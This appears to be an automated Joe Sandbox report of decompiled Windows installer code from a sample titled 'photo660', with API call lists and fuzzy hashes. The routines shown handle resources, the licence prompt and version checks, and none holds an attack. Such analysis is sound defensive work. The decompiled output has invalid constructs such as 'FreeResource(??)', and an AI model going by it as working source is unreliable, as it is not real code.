                                                                                                                                                                                                        				struct HINSTANCE__* _t36;
                                                                                                                                                                                                        				intOrPtr* _t40;
                                                                                                                                                                                                        				void* _t41;
                                                                                                                                                                                                        				intOrPtr* _t44;
                                                                                                                                                                                                        				intOrPtr* _t45;
                                                                                                                                                                                                        				void* _t47;
                                                                                                                                                                                                        				signed int _t50;
                                                                                                                                                                                                        				struct HINSTANCE__* _t51;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t44 = __edx;
                                                                                                                                                                                                        				_t16 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t16 ^ _t50;
                                                                                                                                                                                                        				_t46 = 0;
                                                                                                                                                                                                        				_v32 = __ecx;
                                                                                                                                                                                                        				_v36 = 0;
                                                                                                                                                                                                        				_t36 = 1;
                                                                                                                                                                                                        				E0021171E( &_v28, 0x14, "UPDFILE%lu", 0);
                                                                                                                                                                                                        				while(1) {
                                                                                                                                                                                                        					_t51 = _t51 + 0x10;
                                                                                                                                                                                                        					_t21 = FindResourceA(_t46,  &_v28, 0xa);
                                                                                                                                                                                                        					if(_t21 == 0) {
                                                                                                                                                                                                        						break;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					_t45 = LockResource(LoadResource(_t46, _t21));
                                                                                                                                                                                                        					if(_t45 == 0) {
                                                                                                                                                                                                        						 *0x219124 = 0x80070714;
                                                                                                                                                                                                        						_t36 = _t46;
                                                                                                                                                                                                        					} else {
                                                                                                                                                                                                        						_t5 = _t45 + 8; // 0x8
                                                                                                                                                                                                        						_t44 = _t5;
                                                                                                                                                                                                        						_t40 = _t44;
                                                                                                                                                                                                        						_t6 = _t40 + 1; // 0x9
                                                                                                                                                                                                        						_t47 = _t6;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_t26 =  *_t40;
                                                                                                                                                                                                        							_t40 = _t40 + 1;
                                                                                                                                                                                                        						} while (_t26 != 0);
                                                                                                                                                                                                        						_t41 = _t40 - _t47;
                                                                                                                                                                                                        						_t46 = _t51;
                                                                                                                                                                                                        						_t7 = _t41 + 1; // 0xa
                                                                                                                                                                                                        						 *0x21a288( *_t45,  *((intOrPtr*)(_t45 + 4)), _t44, _t7 + _t44);
                                                                                                                                                                                                        						_t30 = _v32();
                                                                                                                                                                                                        						if(_t51 != _t51) {
                                                                                                                                                                                                        							asm("int 0x29");
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_push(_t45);
                                                                                                                                                                                                        						if(_t30 == 0) {
                                                                                                                                                                                                        							_t36 = 0;
                                                                                                                                                                                                        							FreeResource(??);
                                                                                                                                                                                                        						} else {
                                                                                                                                                                                                        							FreeResource();
                                                                                                                                                                                                        							_v36 = _v36 + 1;
                                                                                                                                                                                                        							E0021171E( &_v28, 0x14, "UPDFILE%lu", _v36 + 1);
                                                                                                                                                                                                        							_t46 = 0;
                                                                                                                                                                                                        							continue;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					L12:
                                                                                                                                                                                                        					return E00216CE0(_t36, _t36, _v8 ^ _t50, _t44, _t45, _t46);
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				goto L12;
                                                                                                                                                                                                        			}























                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0021171E: _vsnprintf.MSVCRT ref: 00211750
                                                                                                                                                                                                        • LoadResource.KERNEL32(00000000,00000000,?,?,00000002,00000000,?,002151CA,00000004,00000024,00212F71,?,00000002,00000000), ref: 002162CD
                                                                                                                                                                                                        • LockResource.KERNEL32(00000000,?,?,00000002,00000000,?,002151CA,00000004,00000024,00212F71,?,00000002,00000000), ref: 002162D4
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,002151CA,00000004,00000024,00212F71,?,00000002,00000000), ref: 0021631B
                                                                                                                                                                                                        • FindResourceA.KERNEL32(00000000,00000004,0000000A), ref: 00216345
                                                                                                                                                                                                        • FreeResource.KERNEL32(00000000,?,?,00000002,00000000,?,002151CA,00000004,00000024,00212F71,?,00000002,00000000), ref: 00216357
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$FindLoadLock_vsnprintf
                                                                                                                                                                                                        • String ID: UPDFILE%lu
                                                                                                                                                                                                        • API String ID: 2922116661-2329316264
                                                                                                                                                                                                        • Opcode ID: ad44a0d031eb8909d734e9168252e90fab96bddaa631bb6648d3891050e2f2fe
                                                                                                                                                                                                        • Instruction ID: 19ff96b95d4c0d87119bf0257ca12ca862a21b6d912be83bbc732495be1553cf
                                                                                                                                                                                                        • Opcode Fuzzy Hash: ad44a0d031eb8909d734e9168252e90fab96bddaa631bb6648d3891050e2f2fe
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 42213731A10219ABCB109FA4DC4D9FFBBB8FF58710B104159FA12A3241DB758D62CBE0
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 100%
                                                                                                                                                                                                        			E00213A3F(void* __eflags) {
                                                                                                                                                                                                        				void* _t3;
                                                                                                                                                                                                        				void* _t9;
                                                                                                                                                                                                        				CHAR* _t16;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t16 = "LICENSE";
                                                                                                                                                                                                        				_t1 = E0021468F(_t16, 0, 0) + 1; // 0x1
                                                                                                                                                                                                        				_t3 = LocalAlloc(0x40, _t1);
                                                                                                                                                                                                        				 *0x218d4c = _t3;
                                                                                                                                                                                                        				if(_t3 != 0) {
                                                                                                                                                                                                        					_t19 = _t16;
                                                                                                                                                                                                        					if(E0021468F(_t16, _t3, _t28) != 0) {
                                                                                                                                                                                                        						if(lstrcmpA( *0x218d4c, "<None>") == 0) {
                                                                                                                                                                                                        							LocalFree( *0x218d4c);
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0x219124 = 0;
                                                                                                                                                                                                        							return 1;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t9 = E00216517(_t19, 0x7d1, 0, E00213100, 0, 0);
                                                                                                                                                                                                        						LocalFree( *0x218d4c);
                                                                                                                                                                                                        						if(_t9 != 0) {
                                                                                                                                                                                                        							goto L9;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						 *0x219124 = 0x800704c7;
                                                                                                                                                                                                        						L2:
                                                                                                                                                                                                        						return 0;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					E002144B9(0, 0x4b1, 0, 0, 0x10, 0);
                                                                                                                                                                                                        					LocalFree( *0x218d4c);
                                                                                                                                                                                                        					 *0x219124 = 0x80070714;
                                                                                                                                                                                                        					goto L2;
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				E002144B9(0, 0x4b5, 0, 0, 0x10, 0);
                                                                                                                                                                                                        				 *0x219124 = E00216285();
                                                                                                                                                                                                        				goto L2;
                                                                                                                                                                                                        			}







                                                                                                                                                                                                        APIs
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146A0
                                                                                                                                                                                                          • Part of subcall function 0021468F: SizeofResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146A9
                                                                                                                                                                                                          • Part of subcall function 0021468F: FindResourceA.KERNEL32(00000000,TITLE,0000000A), ref: 002146C3
                                                                                                                                                                                                          • Part of subcall function 0021468F: LoadResource.KERNEL32(00000000,00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146CC
                                                                                                                                                                                                          • Part of subcall function 0021468F: LockResource.KERNEL32(00000000,?,00212D1A,0000007F,?,?,?,?,?,?,?,00000002,00000000), ref: 002146D3
                                                                                                                                                                                                          • Part of subcall function 0021468F: memcpy_s.MSVCRT ref: 002146E5
                                                                                                                                                                                                          • Part of subcall function 0021468F: FreeResource.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,00000002,00000000), ref: 002146EF
                                                                                                                                                                                                        • LocalAlloc.KERNEL32(00000040,00000001,00000000,?,00000002,00000000,00212F64,?,00000002,00000000), ref: 00213A5D
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00000000,00000010,00000000,00000000), ref: 00213AB3
                                                                                                                                                                                                          • Part of subcall function 002144B9: LoadStringA.USER32(000004B1,?,00000200,00000000), ref: 00214518
                                                                                                                                                                                                          • Part of subcall function 002144B9: MessageBoxA.USER32(?,?,photo660,00010010), ref: 00214554
                                                                                                                                                                                                          • Part of subcall function 00216285: GetLastError.KERNEL32(00215BBC), ref: 00216285
                                                                                                                                                                                                        • lstrcmpA.KERNEL32(<None>,00000000), ref: 00213AD0
                                                                                                                                                                                                        • LocalFree.KERNEL32 ref: 00213B13
                                                                                                                                                                                                          • Part of subcall function 00216517: FindResourceA.KERNEL32(00210000,000007D6,00000005), ref: 0021652A
                                                                                                                                                                                                          • Part of subcall function 00216517: LoadResource.KERNEL32(00210000,00000000,?,?,00212EE8,00000000,002119E0,00000547,0000083E,?,?,?,?,?,?,?), ref: 00216538
                                                                                                                                                                                                          • Part of subcall function 00216517: DialogBoxIndirectParamA.USER32(00210000,00000000,00000547,002119E0,00000000), ref: 00216557
                                                                                                                                                                                                          • Part of subcall function 00216517: FreeResource.KERNEL32(00000000,?,?,00212EE8,00000000,002119E0,00000547,0000083E,?,?,?,?,?,?,?,00000002), ref: 00216560
                                                                                                                                                                                                        • LocalFree.KERNEL32(00000000,00213100,00000000,00000000), ref: 00213AF4
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: Resource$Free$Local$FindLoad$AllocDialogErrorIndirectLastLockMessageParamSizeofStringlstrcmpmemcpy_s
                                                                                                                                                                                                        • String ID: <None>$LICENSE
                                                                                                                                                                                                        • API String ID: 2414642746-383193767
                                                                                                                                                                                                        • Opcode ID: bcba8a26a3f28071b93cf2d61f73004fe1ff047fe65b1b97161fb9fccce2f6db
                                                                                                                                                                                                        • Instruction ID: 9e084987fe40a46e3ac8670044d429f4df7d06d4c150ed68087877ec527e2b6b
                                                                                                                                                                                                        • Opcode Fuzzy Hash: bcba8a26a3f28071b93cf2d61f73004fe1ff047fe65b1b97161fb9fccce2f6db
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 30118734251201BBD724AF32BC1DFD739FADFF9710B10843EB64AD55A1DE7988A08A64
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 94%
                                                                                                                                                                                                        			E002124E0(void* __ebx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t7;
                                                                                                                                                                                                        				void* _t20;
                                                                                                                                                                                                        				long _t26;
                                                                                                                                                                                                        				signed int _t27;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t20 = __ebx;
                                                                                                                                                                                                        				_t7 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t7 ^ _t27;
                                                                                                                                                                                                        				_t25 = 0x104;
                                                                                                                                                                                                        				_t26 = 0;
                                                                                                                                                                                                        				if(GetWindowsDirectoryA( &_v268, 0x104) != 0) {
                                                                                                                                                                                                        					E0021658A( &_v268, 0x104, "wininit.ini");
                                                                                                                                                                                                        					WritePrivateProfileStringA(0, 0, 0,  &_v268);
                                                                                                                                                                                                        					_t25 = _lopen( &_v268, 0x40);
                                                                                                                                                                                                        					if(_t25 != 0xffffffff) {
                                                                                                                                                                                                        						_t26 = _llseek(_t25, 0, 2);
                                                                                                                                                                                                        						_lclose(_t25);
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        				}
                                                                                                                                                                                                        				return E00216CE0(_t26, _t20, _v8 ^ _t27, 0x104, _t25, _t26);
                                                                                                                                                                                                        			}












                                                                                                                                                                                                        APIs
                                                                                                                                                                                                        • GetWindowsDirectoryA.KERNEL32(?,00000104,00000000,00000000), ref: 00212506
                                                                                                                                                                                                        • WritePrivateProfileStringA.KERNEL32(00000000,00000000,00000000,?), ref: 0021252C
                                                                                                                                                                                                        • _lopen.KERNEL32 ref: 0021253B
                                                                                                                                                                                                        • _llseek.KERNEL32(00000000,00000000,00000002), ref: 0021254C
                                                                                                                                                                                                        • _lclose.KERNEL32(00000000), ref: 00212555
                                                                                                                                                                                                        Strings
                                                                                                                                                                                                        Memory Dump Source
                                                                                                                                                                                                        • Source File: 00000001.00000002.447434923.0000000000211000.00000020.00000001.01000000.00000004.sdmp, Offset: 00210000, based on PE: true
                                                                                                                                                                                                        • Associated: 00000001.00000002.447421507.0000000000210000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447448828.0000000000218000.00000004.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021A000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        • Associated: 00000001.00000002.447457924.000000000021C000.00000002.00000001.01000000.00000004.sdmp
                                                                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                                                                        • Snapshot File: hcaresult_1_2_210000_v7020033.jbxd
                                                                                                                                                                                                        Similarity
                                                                                                                                                                                                        • API ID: DirectoryPrivateProfileStringWindowsWrite_lclose_llseek_lopen
                                                                                                                                                                                                        • String ID: wininit.ini
                                                                                                                                                                                                        • API String ID: 3273605193-4206010578
                                                                                                                                                                                                        • Opcode ID: 7856bef8b3690eeb7bcbfc4d46eaab012de85019c468d6b15731bd5d1d624e47
                                                                                                                                                                                                        • Instruction ID: 979a81e2fbac983d704f5534a38c660951e40211661805980a5440cff928278c
                                                                                                                                                                                                        • Opcode Fuzzy Hash: 7856bef8b3690eeb7bcbfc4d46eaab012de85019c468d6b15731bd5d1d624e47
                                                                                                                                                                                                        • Instruction Fuzzy Hash: 9E01F532601128A7C720DF69AC4CEDF7BBDEB69760F004165FA48D3190DE748E95CA91
                                                                                                                                                                                                        Uniqueness

                                                                                                                                                                                                        Uniqueness Score: -1.00%

                                                                                                                                                                                                        C-Code - Quality: 75%
                                                                                                                                                                                                        			E002136EE(CHAR* __ecx) {
                                                                                                                                                                                                        				signed int _v8;
                                                                                                                                                                                                        				char _v268;
                                                                                                                                                                                                        				struct _OSVERSIONINFOA _v416;
                                                                                                                                                                                                        				signed int _v420;
                                                                                                                                                                                                        				signed int _v424;
                                                                                                                                                                                                        				CHAR* _v428;
                                                                                                                                                                                                        				CHAR* _v432;
                                                                                                                                                                                                        				signed int _v436;
                                                                                                                                                                                                        				CHAR* _v440;
                                                                                                                                                                                                        				void* __ebx;
                                                                                                                                                                                                        				void* __edi;
                                                                                                                                                                                                        				void* __esi;
                                                                                                                                                                                                        				signed int _t72;
                                                                                                                                                                                                        				CHAR* _t77;
                                                                                                                                                                                                        				CHAR* _t91;
                                                                                                                                                                                                        				CHAR* _t94;
                                                                                                                                                                                                        				int _t97;
                                                                                                                                                                                                        				CHAR* _t98;
                                                                                                                                                                                                        				signed char _t99;
                                                                                                                                                                                                        				CHAR* _t104;
                                                                                                                                                                                                        				signed short _t107;
                                                                                                                                                                                                        				signed int _t109;
                                                                                                                                                                                                        				short _t113;
                                                                                                                                                                                                        				void* _t114;
                                                                                                                                                                                                        				signed char _t115;
                                                                                                                                                                                                        				short _t119;
                                                                                                                                                                                                        				CHAR* _t123;
                                                                                                                                                                                                        				CHAR* _t124;
                                                                                                                                                                                                        				CHAR* _t129;
                                                                                                                                                                                                        				signed int _t131;
                                                                                                                                                                                                        				signed int _t132;
                                                                                                                                                                                                        				CHAR* _t135;
                                                                                                                                                                                                        				CHAR* _t138;
                                                                                                                                                                                                        				signed int _t139;
                                                                                                                                                                                                        
                                                                                                                                                                                                        				_t72 =  *0x218004; // 0x58ac7c6d
                                                                                                                                                                                                        				_v8 = _t72 ^ _t139;
                                                                                                                                                                                                        				_v416.dwOSVersionInfoSize = 0x94;
                                                                                                                                                                                                        				_t115 = __ecx;
                                                                                                                                                                                                        				_t135 = 0;
                                                                                                                                                                                                        				_v432 = __ecx;
                                                                                                                                                                                                        				_t138 = 0;
                                                                                                                                                                                                        				if(GetVersionExA( &_v416) != 0) {
                                                                                                                                                                                                        					_t133 = _v416.dwMajorVersion;
                                                                                                                                                                                                        					_t119 = 2;
                                                                                                                                                                                                        					_t77 = _v416.dwPlatformId - 1;
                                                                                                                                                                                                        					__eflags = _t77;
                                                                                                                                                                                                        					if(_t77 == 0) {
                                                                                                                                                                                                        						_t119 = 0;
                                                                                                                                                                                                        						__eflags = 1;
                                                                                                                                                                                                        						 *0x218184 = 1;
                                                                                                                                                                                                        						 *0x218180 = 1;
                                                                                                                                                                                                        						L13:
                                                                                                                                                                                                        						 *0x219a40 = _t119;
                                                                                                                                                                                                        						L14:
                                                                                                                                                                                                        						__eflags =  *0x218a34 - _t138; // 0x0
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _t115;
                                                                                                                                                                                                        						if(_t115 == 0) {
                                                                                                                                                                                                        							goto L66;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_v428 = _t135;
                                                                                                                                                                                                        						__eflags = _t119;
                                                                                                                                                                                                        						_t115 = _t115 + ((0 | _t119 != 0x00000000) - 0x00000001 & 0x0000003c) + 4;
                                                                                                                                                                                                        						_t11 =  &_v420;
                                                                                                                                                                                                        						 *_t11 = _v420 & _t138;
                                                                                                                                                                                                        						__eflags =  *_t11;
                                                                                                                                                                                                        						_v440 = _t115;
                                                                                                                                                                                                        						do {
                                                                                                                                                                                                        							_v424 = _t135 * 0x18;
                                                                                                                                                                                                        							_v436 = E00212A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_t135 * 0x18 + _t115)),  *((intOrPtr*)(_t135 * 0x18 + _t115 + 4)));
                                                                                                                                                                                                        							_t91 = E00212A89(_v416.dwMajorVersion, _v416.dwMinorVersion,  *((intOrPtr*)(_v424 + _t115 + 0xc)),  *((intOrPtr*)(_v424 + _t115 + 0x10)));
                                                                                                                                                                                                        							_t123 = _v436;
                                                                                                                                                                                                        							_t133 = 0x54d;
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 < 0) {
                                                                                                                                                                                                        								L32:
                                                                                                                                                                                                        								__eflags = _v420 - 1;
                                                                                                                                                                                                        								if(_v420 == 1) {
                                                                                                                                                                                                        									_t138 = 0x54c;
                                                                                                                                                                                                        									L36:
                                                                                                                                                                                                        									__eflags = _t138;
                                                                                                                                                                                                        									if(_t138 != 0) {
                                                                                                                                                                                                        										L40:
                                                                                                                                                                                                        										__eflags = _t138 - _t133;
                                                                                                                                                                                                        										if(_t138 == _t133) {
                                                                                                                                                                                                        											L30:
                                                                                                                                                                                                        											_v420 = _v420 & 0x00000000;
                                                                                                                                                                                                        											_t115 = 0;
                                                                                                                                                                                                        											_v436 = _v436 & 0x00000000;
                                                                                                                                                                                                        											__eflags = _t138 - _t133;
                                                                                                                                                                                                        											_t133 = _v432;
                                                                                                                                                                                                        											if(__eflags != 0) {
                                                                                                                                                                                                        												_t124 = _v440;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t124 = _t133[0x80] + 0x84 + _t135 * 0x3c + _t133;
                                                                                                                                                                                                        												_v420 =  &_v268;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags = _t124;
                                                                                                                                                                                                        											if(_t124 == 0) {
                                                                                                                                                                                                        												_t135 = _v436;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												_t99 = _t124[0x30];
                                                                                                                                                                                                        												_t135 = _t124[0x34] + 0x84 + _t133;
                                                                                                                                                                                                        												__eflags = _t99 & 0x00000001;
                                                                                                                                                                                                        												if((_t99 & 0x00000001) == 0) {
                                                                                                                                                                                                        													asm("sbb ebx, ebx");
                                                                                                                                                                                                        													_t115 =  ~(_t99 & 2) & 0x00000101;
                                                                                                                                                                                                        												} else {
                                                                                                                                                                                                        													_t115 = 0x104;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        											__eflags =  *0x218a38 & 0x00000001;
                                                                                                                                                                                                        											if(( *0x218a38 & 0x00000001) != 0) {
                                                                                                                                                                                                        												L64:
                                                                                                                                                                                                        												_push(0);
                                                                                                                                                                                                        												_push(0x30);
                                                                                                                                                                                                        												_push(_v420);
                                                                                                                                                                                                        												_push("photo660");
                                                                                                                                                                                                        												goto L65;
                                                                                                                                                                                                        											} else {
                                                                                                                                                                                                        												__eflags = _t135;
                                                                                                                                                                                                        												if(_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												__eflags =  *_t135;
                                                                                                                                                                                                        												if( *_t135 == 0) {
                                                                                                                                                                                                        													goto L64;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												MessageBeep(0);
                                                                                                                                                                                                        												_t94 = E0021681F(_t115);
                                                                                                                                                                                                        												__eflags = _t94;
                                                                                                                                                                                                        												if(_t94 == 0) {
                                                                                                                                                                                                        													L57:
                                                                                                                                                                                                        													0x180030 = 0x30;
                                                                                                                                                                                                        													L58:
                                                                                                                                                                                                        													_t97 = MessageBoxA(0, _t135, "photo660", 0x00180030 | _t115);
                                                                                                                                                                                                        													__eflags = _t115 & 0x00000004;
                                                                                                                                                                                                        													if((_t115 & 0x00000004) == 0) {
                                                                                                                                                                                                        														__eflags = _t115 & 0x00000001;
                                                                                                                                                                                                        														if((_t115 & 0x00000001) == 0) {
                                                                                                                                                                                                        															goto L66;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														__eflags = _t97 - 1;
                                                                                                                                                                                                        														L62:
                                                                                                                                                                                                        														if(__eflags == 0) {
                                                                                                                                                                                                        															_t138 = 0;
                                                                                                                                                                                                        														}
                                                                                                                                                                                                        														goto L66;
                                                                                                                                                                                                        													}
                                                                                                                                                                                                        													__eflags = _t97 - 6;
                                                                                                                                                                                                        													goto L62;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												_t98 = E002167C9(_t124, _t124);
                                                                                                                                                                                                        												__eflags = _t98;
                                                                                                                                                                                                        												if(_t98 == 0) {
                                                                                                                                                                                                        													goto L57;
                                                                                                                                                                                                        												}
                                                                                                                                                                                                        												goto L58;
                                                                                                                                                                                                        											}
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138 - 0x54c;
                                                                                                                                                                                                        										if(_t138 == 0x54c) {
                                                                                                                                                                                                        											goto L30;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										__eflags = _t138;
                                                                                                                                                                                                        										if(_t138 == 0) {
                                                                                                                                                                                                        											goto L66;
                                                                                                                                                                                                        										}
                                                                                                                                                                                                        										_t135 = 0;
                                                                                                                                                                                                        										__eflags = 0;
                                                                                                                                                                                                        										goto L44;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									L37:
                                                                                                                                                                                                        									_t129 = _v432;
                                                                                                                                                                                                        									__eflags = _t129[0x7c];
                                                                                                                                                                                                        									if(_t129[0x7c] == 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t133 =  &_v268;
                                                                                                                                                                                                        									_t104 = E002128E8(_t129,  &_v268, _t129,  &_v428);
                                                                                                                                                                                                        									__eflags = _t104;
                                                                                                                                                                                                        									if(_t104 != 0) {
                                                                                                                                                                                                        										goto L66;
                                                                                                                                                                                                        									}
                                                                                                                                                                                                        									_t135 = _v428;
                                                                                                                                                                                                        									_t133 = 0x54d;
                                                                                                                                                                                                        									_t138 = 0x54d;
                                                                                                                                                                                                        									goto L40;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L33;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							if(_t91 > 0) {
                                                                                                                                                                                                        								goto L32;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t123;
                                                                                                                                                                                                        							if(_t123 != 0) {
                                                                                                                                                                                                        								__eflags = _t91;
                                                                                                                                                                                                        								if(_t91 != 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								__eflags = (_v416.dwBuildNumber & 0x0000ffff) -  *((intOrPtr*)(_v424 + _t115 + 0x14));
                                                                                                                                                                                                        								L27:
                                                                                                                                                                                                        								if(__eflags <= 0) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								L28:
                                                                                                                                                                                                        								__eflags = _t135;
                                                                                                                                                                                                        								if(_t135 == 0) {
                                                                                                                                                                                                        									goto L33;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								_t138 = 0x54c;
                                                                                                                                                                                                        								goto L30;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t91;
                                                                                                                                                                                                        							_t107 = _v416.dwBuildNumber;
                                                                                                                                                                                                        							if(_t91 != 0) {
                                                                                                                                                                                                        								_t131 = _v424;
                                                                                                                                                                                                        								__eflags = (_t107 & 0x0000ffff) -  *((intOrPtr*)(_t131 + _t115 + 8));
                                                                                                                                                                                                        								if((_t107 & 0x0000ffff) >=  *((intOrPtr*)(_t131 + _t115 + 8))) {
                                                                                                                                                                                                        									goto L37;
                                                                                                                                                                                                        								}
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t132 = _t107 & 0x0000ffff;
                                                                                                                                                                                                        							_t109 = _v424;
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 8));
                                                                                                                                                                                                        							if(_t132 <  *((intOrPtr*)(_t109 + _t115 + 8))) {
                                                                                                                                                                                                        								goto L28;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							__eflags = _t132 -  *((intOrPtr*)(_t109 + _t115 + 0x14));
                                                                                                                                                                                                        							goto L27;
                                                                                                                                                                                                        							L33:
                                                                                                                                                                                                        							_t135 =  &(_t135[1]);
                                                                                                                                                                                                        							_v428 = _t135;
                                                                                                                                                                                                        							_v420 = _t135;
                                                                                                                                                                                                        							__eflags = _t135 - 2;
                                                                                                                                                                                                        						} while (_t135 < 2);
                                                                                                                                                                                                        						goto L36;
                                                                                                                                                                                                        					}
                                                                                                                                                                                                        					__eflags = _t77 == 1;
                                                                                                                                                                                                        					if(_t77 == 1) {
                                                                                                                                                                                                        						 *0x219a40 = _t119;
                                                                                                                                                                                                        						 *0x218184 = 1;
                                                                                                                                                                                                        						 *0x218180 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - 3;
                                                                                                                                                                                                        						if(_t133 > 3) {
                                                                                                                                                                                                        							__eflags = _t133 - 5;
                                                                                                                                                                                                        							if(_t133 < 5) {
                                                                                                                                                                                                        								goto L14;
                                                                                                                                                                                                        							}
                                                                                                                                                                                                        							_t113 = 3;
                                                                                                                                                                                                        							_t119 = _t113;
                                                                                                                                                                                                        							goto L13;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						_t119 = 1;
                                                                                                                                                                                                        						_t114 = 3;
                                                                                                                                                                                                        						 *0x219a40 = 1;
                                                                                                                                                                                                        						__eflags = _t133 - _t114;
                                                                                                                                                                                                        						if(__eflags < 0) {
                                                                                                                                                                                                        							L9:
                                                                                                                                                                                                        							 *0x218184 = _t135;
                                                                                                                                                                                                        							 *0x218180 = _t135;
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						if(__eflags != 0) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
                                                                                                                                                                                                        						__eflags = _v416.dwMinorVersion - 0x33;
                                                                                                                                                                                                        						if(_v416.dwMinorVersion >= 0x33) {
                                                                                                                                                                                                        							goto L14;
                                                                                                                                                                                                        						}
